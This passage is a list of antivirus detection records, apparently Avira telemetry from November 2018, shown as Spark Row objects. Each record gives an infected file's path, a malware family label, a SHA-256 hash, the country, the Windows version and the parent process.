  Row(detection=Row(filename='a0027066.exe', filepath='D:\\System Volume Information\\_restore{0BEE0DD9-7CB5-4D18-97A2-E6F2B2544E0C}\\RP27\\A0027066.EXE', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='d2a7aaffbf9078ad6e938c12231c7c827d761eb22fd78a5268ea6dc1050f5bd8', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:46:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lovebeat.exe', filepath='D:\\Online Games\\Steam\\steamapps\\downloading\\354290\\LoveBeat.exe', filesize=3152000, name='TR/Patched.Ren.Gen2.#M300.#R100092'), hash='cf02df4d4f690635255a92095260651aec4ddbd92cf889f99e5320e0369b051d', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:11:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-133607-c30b6af3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-133607-C30B6AF3', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:36:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ig7icd32.dll', filepath='d:\\program\\driver high acer end rri\\vga_intel_9.17.10.2843_w7x64_a\\vga_intel_9.17.10.2843_win7x64\\graphics\\ig7icd32.dll', filesize=8576000, name='W32/Ramnit.C.#M1.#R1'), hash='bb340d1b0a1a16bbc2e72c455b3a137cdde5ece11558f5255042d8b148bbb3bf', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:18:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ehshell.exe', filepath='\\\\?\\C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='HEUR/APC.#M1.#R1'), hash='f037f8c780ea0c3b4e11e3170b698e99790feb6c3a78ea1a02fd226b676d306f', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:18:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmplayer.exe', filepath='\\\\?\\C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='f4bffa5ab80cd1d32a7d1c13392a32b3538c88b87b86dcd7d22ebd09482f5d58', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:08:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:55:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:45:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151324-1fb193a3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1a5be72b\\AVSCAN-20181104-145747-B8617A13\\AVSCAN-20181104-151324-1FB193A3', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='MU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T11:13:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rdrleakdiag.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_microsoft-windows-r..eak-diagnostic-core_31bf3856ad364e35_6.1.7600.16385_none_5ae7f926deb5de01\\rdrleakdiag.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='f93d606b31f1a4239e32b93fd25289203882b91ffe222007d5e304a76659ae8e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:59:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00252451', filepath='C:\\Windows\\TEMP\\tmp00005a66\\tmp00252451', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-01T06:42:45Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k secsvcs', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T05:53:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='system volume information.pif', filepath='d:\\system volume information\\System Volume Information.pif', filesize=5952000, name='HEUR/AGEN.1015658.#M1.#R1'), hash='6f59c94a106529163adc6375303d689d70c6c0b312d0d536cd85811fcdf1dd14', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:50:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155820-e2792772', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155820-E2792772', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:58:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:03:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered nilid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nilid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3acf7c1425fa9fe9629c4cdaf71a882083cd14a828265aa4a0a21ae3f083965b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T11:13:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T14:30:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155909-e7b5aef6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155909-E7B5AEF6', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:59:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='csproj.dll', filepath='C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VC#\\VCSPackages\\csproj.dll', filesize=1984000, name='W32/Ramnit.CD.#M1.#R1'), hash='0e6ee395a2a9ee46eccfddff00e83536bb187d60776d63cffc76c7702e18c466', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T21:01:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='libegl.dll', filepath='C:\\Program Files (x86)\\crxbro Browser\\crxbro\\libegl.dll', filesize=80000, name='TR/Ghokswa.bbago.#M1.#R1'), hash='608157045d1092d1192901f7476b7aaabdd1237ef69ac4539c0ed85b7a374921', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-03-20-27.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T21:30:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:03:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='winampa.exe', filepath='C:\\Program Files\\Winamp\\winampa.exe', filesize=128000, name='W32/Sality.AW.#M1.#R1'), hash='22ba6370f761c9dd8341f7075c959892d3aaa3822856d1b18b142121c2f72ee8', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:56:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcoded_000', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\Transcoded_000', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline='\\\\\\/LOADSAVEDWINDOWS', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T23:59:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-14-12-07.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T08:02:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret_8bcd4d00.exe', filepath='F:\\JDownloader\\Yamicsoft.Windows.10.Manager.v2.3.5\\URET\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET_8bcd4d00.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T14:01:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='raidreconstructor.exe', filepath='H:\\HBCD\\Programs\\RAIDRECONSTRUCTOR.EXE', filesize=64000, name='TR/Agent.wxqvk.#M1.#R1'), hash='3158f958bd97188137ab047ed4a4963579c6eb8cfb7d5bb9e4da03d817cb1f72', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T22:11:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='\\\\?\\C:\\Program Files\\Avira\\AntiVir Desktop\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:01:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='st1.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\VOICE\\ST1\\ST1.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:28:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='csrss.exe', filepath='C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.exe', filesize=1344000, name='TR/Crypt.FKM.Gen.#M300.#R581'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:56:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:02:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:19:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:47:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:50:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:28:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0a4216afb205f4843648dbe8f1405c7499215919a30709c5eabba6c1beef2247', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-20\\0A4216AFB205F4843648DBE8F1405C7499215919A30709C5EABBA6C1BEEF2247', filesize=512000, name='HEUR/AGEN.1033395.#M1.#R1'), hash='0a4216afb205f4843648dbe8f1405c7499215919a30709c5eabba6c1beef2247', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:12:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1589080, timestamp='2018-11-02T22:45:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:33:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0baeae4f38c82ac7f2ff54ebc54c82339f53059d0b5d44b5ae58ca2f80ab605e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0BAEAE4F38C82AC7F2FF54EBC54C82339F53059D0B5D44B5AE58CA2F80AB605E', filesize=148000, name='TR/Crypt.ZPACK.Gen7.#M300.#R600521'), hash='0baeae4f38c82ac7f2ff54ebc54c82339f53059d0b5d44b5ae58ca2f80ab605e', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:24:09Z'), dt=datetime.date(2018, 11, 2)),
